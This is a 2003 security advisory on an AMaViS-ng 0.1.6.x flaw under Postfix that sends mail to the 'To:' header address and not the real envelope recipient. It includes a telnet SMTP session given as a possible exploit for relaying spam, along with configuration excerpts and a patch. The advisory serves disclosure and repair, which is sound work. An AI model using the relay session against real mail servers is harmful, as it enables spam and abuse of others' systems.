9th Apr 2003 [SBWID-6124]
COMMAND
AMaViS-ng possible open relay and mail loss
SYSTEMS AFFECTED
AMaViS-ng 0.1.6.x
PROBLEM
Phil Cyc found following, here with potfix, but not specific to:
with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3;
0.1.4.x is not vulnerable), all email gets forwarded to the address
specified by the "To:" header line, ignoring the real recipient given
via "RCPT TO:".
Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:[email protected]
(250 ok)
rcpt to:[email protected]
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: [email protected]
To: [email protected]
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--
Requirements ============
The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x
installed must accept emails for [email protected].
What does it do
===============
[email protected] is sending an email to [email protected]. The header
of this email contains "To: [email protected]". AMaViS-ng seems to parse
the header and forwards the email to [email protected]. [email protected]
does not get this email. As many postfix users trust their localhost
(no restrictions for localhost), it is possible to relay an email or a
spam mail this way.
configuration files (relevant parts):
=====================================
# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter filter:
filter unix - n n - - pipe
flags Rq user mail argv /usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf
# $amavis-ng/amavis.conf
[global]
mail-transfer-agent Postfix
[Postfix]
postfix /usr/sbin/sendmail
args -i -f
# end of amavis.conf
SOLUTION
Update 10 apr. ===============
Phil Cyc proposed following patch, as soft maintainer did not release
any patch.
diff -Nru amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm
--- amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm Tue Mar 18 00:04:21 2003
+++ amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm Tue Apr 8 23:28:09 2003
@@ -112,22 +112,11 @@
writelog($args,LOG_DEBUG, "Called as amavis ".join(' ',@ARGV));
- while (shift @ARGV) {
- /^-f$/ && next; # ignore "-f"
- /^-d$/ && next; # ignore "-d"
- s/^(.*)$/$1/; # untaint sender or recipient
- if (not defined $$args{'sender'}) {
- if (/^$/) {
- $$args{'sender'} = "<>";
- }
- else {
- $$args{'sender'} = $_;
- }
- }
- else {
- push @{$$args{'recipients'}}, $_;
- }
- }
+ shift @ARGV if $ARGV[0] eq "-f";
+ $$args{'sender'} = shift @ARGV;
+ $$args{'sender'} = "<>" if (!$$args{'sender'});
+ shift @ARGV if $ARGV[0] eq "-d";
+ push @{$$args{'recipients'}}, @ARGV;
# Message file has been written, reset file pointer and put it into
# the record.